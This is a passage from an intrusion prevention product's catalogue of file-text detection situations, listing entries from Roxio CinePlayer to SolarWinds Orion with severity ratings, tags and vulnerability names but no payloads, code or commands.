About this situation: An attempt exploit a Roxio CinePlayer Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Roxio CinePlayer, CVE2007, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-736-5211
Last changed: sgpkg-ips-736-5211
Vulnerability: Roxio-CinePlayer-Buffer-Overflow
Description:
Back to top

File-Text_Rst-Malware

About this situation: Rst malware detected
Context: Text File Stream
Severity: 7
Tags: Unix, Any Hardware, Any Software, Unix not specific, Any Software not specific, Spyware, Malware and Adware
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Rst-Malware
Description:
Back to top

File-Text_Ruby-On-Rails-JSON-Parse-Heap-Based-Buffer-Overflow

About this situation: An attempt to exploit a Ruby On Rails JSON Parse Heap Based Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ruby on Rails, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1411-5242
Vulnerability: Ruby-On-Rails-JSON-Parse-Heap-Based-Buffer-Overflow
Description:
Back to top

File-Text_Ruckus-Iot-Controller-Web-UI-Createuser-Remote-Command-Injection

About this situation: An attempt to exploit a vulnerability in Ruckus IoT Controller detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Ruckus IoT Controller, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Vulnerability: Ruckus-Iot-Controller-Web-UI-Createuser-Remote-Command-Injection
Description:
Back to top

File-Text_Safari-In-Operator-Side-Effect-Exploit

About this situation: An attempt to exploit a vulnerability in Safari detected
Context: Text File Stream
Severity: 7
Tags: OS X, Any Hardware, Safari, CVE2020, OS X not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: Safari-In-Operator-Side-Effect-Exploit
Description:
Back to top

File-Text_Safari-Webkit-Jit-Exploit-For-iOS

About this situation: An attempt to exploit a vulnerability in Safari Webkit JIT detected
Context: Text File Stream
Severity: 7
Tags: OS X, Any Hardware, Safari, CVE2016, OS X not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Vulnerability: Safari-Webkit-Jit-Exploit-For-iOS
Description:
Back to top

File-Text_Safenet-HASP-SL-ActiveX-Control-ChooseFilePath-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SafeNet Privilege SCP (HASP SL) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SafeNet Privilege SCP, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-579-5211
Vulnerability: Safenet-HASP-SL-ActiveX-Control-ChooseFilePath-Buffer-Overflow
Description:
Back to top

File-Text_Saint-Bot-Infection-Traffic

About this situation: Saint Bot infection traffic detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: Saint-Bot-Infection-Traffic
Description:
Back to top

File-Text_SaltStack-Salt-API-SSH-Client-Command-Injection

About this situation: An attempt to exploit a vulnerability in SaltStack Salt detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SaltStack Salt, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1315-5242
Last changed: sgpkg-ips-1352-5242
Vulnerability: SaltStack-Salt-API-SSH-Client-Command-Injection
Description:
Back to top

File-Text_Same-Origin-Policy-Bypass

About this situation: An attempt to exploit a cross-site scripting vulnerability in multiple browsers detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, MS2002, CVE2002, Any Operating System not specific, Generic browser not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-434-4219
Vulnerability: Internet-Explorer-Same-Origin-Policy-Bypass
Konqueror-Same-Origin-Policy-Bypass
Description:
Back to top

File-Text_Samsung-Ipolis-Device-Manager-Findconfigchildekeylist-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Samsung iPOLiS Device Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung iPOLiS Device Manager, CVE2014, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-596-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Samsung-Ipolis-Device-Manager-Findconfigchildekeylist-Buffer-Overflow
Description:
Back to top

File-Text_Samsung-Ipolis-Device-Manager-Writeconfigvalue-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Samsung iPOLiS Device Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung iPOLiS Device Manager, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Vulnerability: Samsung-Ipolis-Device-Manager-Writeconfigvalue-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Samsung-Kies-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in Samsung Kies detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung Kies, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-637-5211
Vulnerability: Samsung-Kies-Arbitrary-Command-Execution
Description:
Back to top

File-Text_Samsung-Net-I-Viewer-Buffer-Overflow

About this situation: An attempt to exploit a Samsung Net-I Viewer Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung NET-i Viewer, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-710-5211
Vulnerability: Samsung-Net-I-Viewer-Buffer-Overflow
Description:
Back to top

File-Text_Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Samsung SmartViewer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung SmartViewer, CVE2014, CVE2015, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Buffer-Overflow
Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Out-Of-Bounds-Indexing
Description:
Back to top

File-Text_Samsung-Smartviewer-Stwaxconfig-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Samsung SmartViewer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung SmartViewer, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Samsung-Smartviewer-Stwaxconfig-Memory-Corruption
Description:
Back to top

File-Text_Samsung-Smartviewer-Stwaxconfignvr-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Samsung SmartViewer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samsung SmartViewer, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-704-5211
Vulnerability: Samsung-Smartviewer-Stwaxconfignvr-Memory-Corruption
Description:
Back to top

File-Text_SAP-Crystal-Reports-Printcontrol.dll-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SAP Crystal Reports detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Crystal Reports, CVE2010, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: SAP-Crystal-Reports-Printcontrol.dll-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_SAP-GUI-ActiveX-Control-Buffer-Overflow

About this situation: Detected attempt to use vulnerable ActiveX component in SAP GUI
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, SAP GUI, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: SAPGUI-AddTab-Method-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_SAP-GUI-Arbitrary-File-Download

About this situation: An attempt to exploit a SAP GUI Arbitrary File Download vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP GUI, CVE2008, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: SAP-GUI-Arbitrary-File-Download
Description:
Back to top

File-Text_SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SAP AG GUI for Windows
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, SAP GUI, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP_SAP-GUI-Eai-Webviewer3d-ActiveX-Stack-Buffer-Overflow
Description:
Back to top

File-Text_SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution

About this situation: An attempt to exploit a vulnerability in SAP GUI detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, SAP GUI, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution
Description:
Back to top

File-Text_SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a file overwrite vulnerability in SAP GUI WebViewer3D ActiveX Control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, SAP GUI, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
Description:
Back to top

File-Text_SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite-Exploit

About this situation: An exploit against a file overwrite vulnerability in SAP GUI WebViewer3D ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, SAP GUI, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
Description:
Back to top

File-Text_SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324

About this situation: An attempt to exploit a vulnerability in SAP NetWeaver detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SAP NetWeaver, CVE2025, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, 1st Most Recent Update, 2nd Most Recent Update, 3rd Most Recent Update, 4th Most Recent Update, 5th Most Recent Update
First detected in: sgpkg-ips-1873-5242
Last changed: sgpkg-ips-1873-5242
Vulnerability: SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324
Description:
Back to top

File-Text_Sasfis-Bot-Traffic

About this situation: Sasfis Bot traffic detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Sasfis-Bot
Description:
Back to top

File-Text_Schneider-Electric-C-Bus-Toolkit-Authentication-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in Schneider Electric C-Bus Toolkit detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric C-Bus Toolkit, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1420-5242
Last changed: sgpkg-ips-1770-5242
Vulnerability: Schneider-Electric-C-Bus-Toolkit-Authentication-Bypass-Vulnerability
Description:
Back to top

File-Text_Schneider-Electric-IGSS-Getrmsreportfile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Schneider Electric IGSS detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric IGSS, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Vulnerability: Schneider-Electric-IGSS-Getrmsreportfile-Directory-Traversal
Description:
Back to top

File-Text_Schneider-Electric-Isobjectmodel-Removeparameter-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Schneider Electric SoMachine detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Schneider-Electric-Isobjectmodel-Removeparameter-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Schneider-Electric-Pelco-DS-nvs-Rvctl.rvcontrol.1-Buffer-Overflow

About this situation: Use of a vulnerable function in Schneider Electric Pelco DS-NVs detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric Pelco DS-NVs, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-636-5211
Vulnerability: Schneider-Electric-Pelco-DS-nvs-Rvctl.rvcontrol.1-Buffer-Overflow
Description:
Back to top

File-Text_Schneider-Electric-Proclima-Atx45-Sethtmlfilename-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Schneider Electric ProClima detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric ProClima, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Schneider-Electric-Proclima-Atx45-Sethtmlfilename-Heap-Buffer-Overflow
Description:
Back to top

File-Text_Schneider-Electric-Proclima-Metadraw-Several-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Schneider Electric ProClima detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric ProClima, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-628-5211
Last changed: sgpkg-ips-628-5211
Vulnerability: Schneider-Electric-Proclima-Metadraw-Arrangeobjects-Memory-Corruption
Schneider-Electric-Proclima-Metadraw-ObjLinks-Remote-Code-Execution
Description:
Back to top

File-Text_Schneider-Electric-Proclima-Multiple-Methods-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Schneider Electric ProClima detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric ProClima, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-719-5211
Last changed: sgpkg-ips-719-5211
Vulnerability: Schneider-Electric-Proclima-F1bookview-Copyall-Memory-Corruption
Schneider-Electric-Proclima-F1bookview-Attachtoss-Memory-Corruption
Schneider-Electric-Proclima-F1bookview-Setvalidationrule-Memory-Corruption
Schneider-Electric-Proclima-F1bookview-Attach-Memory-Corruption
Description:
Back to top

File-Text_Schneider-Electric-Somachine-Hvac-Axeditgrid-ActiveX-Untrusted-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Schneider Electric SoMachine HVAC detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Schneider Electric SoMachine HVAC, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-784-5211
Last changed: sgpkg-ips-784-5211
Vulnerability: Schneider-Electric-Somachine-Axeditgrid-ActiveX-Untrusted-Pointer-Dereference
Description:
Back to top

File-Text_Script-Encoder-Obfuscated-Script-Detected

About this situation: Obfuscated Script Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1243-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Script-File-With-Suspicious-References

About this situation: Suspicious traffic detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1122-5242
Last changed: sgpkg-ips-1122-5242
Description:
Back to top

File-Text_Script-From-A-Suspicious-Site

About this situation: Detected a suspicious script file
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-831-5242
Last changed: sgpkg-ips-1166-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Script-In-HTML-Head

About this situation: Detected Script In HTML Head
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-439-4219
Description:
Back to top

File-Text_Scripting.FileSystemObject-ActiveX-Object-Local-File-Write

About this situation: Detected a local file write attempt using Scripting.FileSystemObject ActiveX object
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1204-5242
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Description:
Back to top

File-Text_Sednit-Exploit-Kit-Landing-Page

About this situation: Access to suspected Sednit Exploit Kit landing page detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-1282-5242
Vulnerability: Sednit-Exploit-Kit
Description:
Back to top

File-Text_Server-Side-Includes-In-Server-Reply

About this situation: Detected server side scripting in the server reply
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Web-Server-Side-Script-Disclosure
Description:
Back to top

File-Text_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: Text File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1837-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-Text_Shell.Application-ActiveX-Object-Local-File-Execute

About this situation: Detected a local file execute attempt using Shell.Application ActiveX object
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-432-4219
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Microsoft-Internet-Explorer-Shell.Application-Object-Vulnerability-v1.0
Description:
Back to top

File-Text_ShellExecute-ActiveX-Object-Batch-Script-Local-Execute

About this situation: Detected a local batch file execute attempt using ShellExecute
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Generic HTTP client, Windows not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1779-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Description:
Back to top

File-Text_Shiotop-Botnet-Traffic

About this situation: Shiotop botnet traffic detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-753-5211
Last changed: sgpkg-ips-753-5211
Vulnerability: Nymaim-Botnet
Description:
Back to top

File-Text_Siemens-Automation-License-Manager-ActiveX-Control-Vulnerability

About this situation: An attempt to exploit a vulnerability in Automation License Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens Automation License Manager, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Siemens-Automation-License-Manager-ActiveX-Control-Vulnerability
Description:
Back to top

File-Text_Siemens-Gigaset-se551-Information-Disclosure

About this situation: An information disclosure in Siemens Gigaset se551 detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Siemens Gigaset se551, Any Operating System not specific, Potential Disclosure
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-608-5211
Vulnerability: Siemens-Gigaset-se551-Authorization-Bypass
Description:
Back to top

File-Text_Siemens-SIMATIC-WinCC-RegReader-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Siemens SIMATIC WinCC detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens SIMATIC WinCC, Siemens PCS7, CVE2013, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-630-5211
Vulnerability: Siemens-SIMATIC-WinCC-RegReader-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Siemens-Sinec-NMS-CVE-2021-33730-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Siemens SINEC NMS detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens SINEC NMS, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Vulnerability: Siemens-Sinec-NMS-CVE-2021-33730-SQL-Injection
Description:
Back to top

File-Text_Siemens-Sinec-NMS-CVE-2021-33731-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Siemens SINEC NMS detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens SINEC NMS, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Vulnerability: Siemens-Sinec-NMS-CVE-2021-33731-SQL-Injection
Description:
Back to top

File-Text_Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Siemens SINEC NMS detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens SINEC NMS, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal
Description:
Back to top

File-Text_Siemens-Solid-Edge-ST4/ST5-WebPartHelper-ActiveX-Control-Vulnerability

About this situation: An attempt to exploit a vulnerability in Siemens Solid Edge ST4/ST5 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens Solid Edge ST4/ST5, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Siemens-Solid-Edge-ST4/ST5-WebPartHelper-ActiveX-Control-Vulnerability
Description:
Back to top

File-Text_SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption

About this situation: An attempt to exploit a vulnerability in Skype detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Skype, CVE2007, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-581-5211
Vulnerability: SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption
Description:
Back to top

File-Text_Smartertools-Smartermail-Message-Onerror-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in SmarterTools SmarterMail detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SmarterTools SmarterMail, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1409-5242
Vulnerability: Smartertools-Smartermail-Message-Onerror-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_SmartScreen-Security-warning-Bypass-For-Script-Files-CVE-2023-24880

About this situation: An attempt to exploit a vulnerability in SmartScreen detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, SmartScreen, MS2023-03, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1580-5242
Last changed: sgpkg-ips-1580-5242
Vulnerability: SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880
Description:
Back to top

File-Text_SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471

About this situation: An attempt to exploit a vulnerability in SnakeYaml detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SnakeYaml, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1665-5242
Vulnerability: SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
Description:
Back to top

File-Text_SocGholish-Framework-Injected-Script

About this situation: SocGholish framework script injection detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1438-5242
Last changed: sgpkg-ips-1536-5242
Vulnerability: SocGholish-Framework-Activity
Description:
Back to top

File-Text_SocGholish-Zip-File

About this situation: SocGholish Zip file was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1270-5242
Vulnerability: SocGholish-Framework-Activity
Description:
Back to top

File-Text_Soft-Hyphen-Obfuscation

About this situation: A text file using obfuscated content detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1430-5242
Description:
Back to top

File-Text_Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-23478

About this situation: An attempt to exploit a vulnerability in SolarWinds Access Rights Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Access Rights Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-23478
Description:
Back to top

File-Text_Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-28075

About this situation: An attempt to exploit a vulnerability in SolarWinds Access Rights Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Access Rights Manager, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1731-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-28075
Description:
Back to top

File-Text_Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write

About this situation: An attempt to exploit a vulnerability in SolarWinds Network Configuration Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Network Configuration Manager, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1481-5242
Last changed: sgpkg-ips-1481-5242
Vulnerability: Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write
Description:
Back to top

File-Text_Solarwinds-Orion-Pepco32c-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Gigasoft ProEssentials v5 Pro detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Gigasoft ProEssentials, SolarWinds Server and Application Monitor, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-637-5211
Vulnerability: Solarwinds-Orion-Pepco32c-ActiveX-Control-Buffer-Overflow
Description:
Back to top

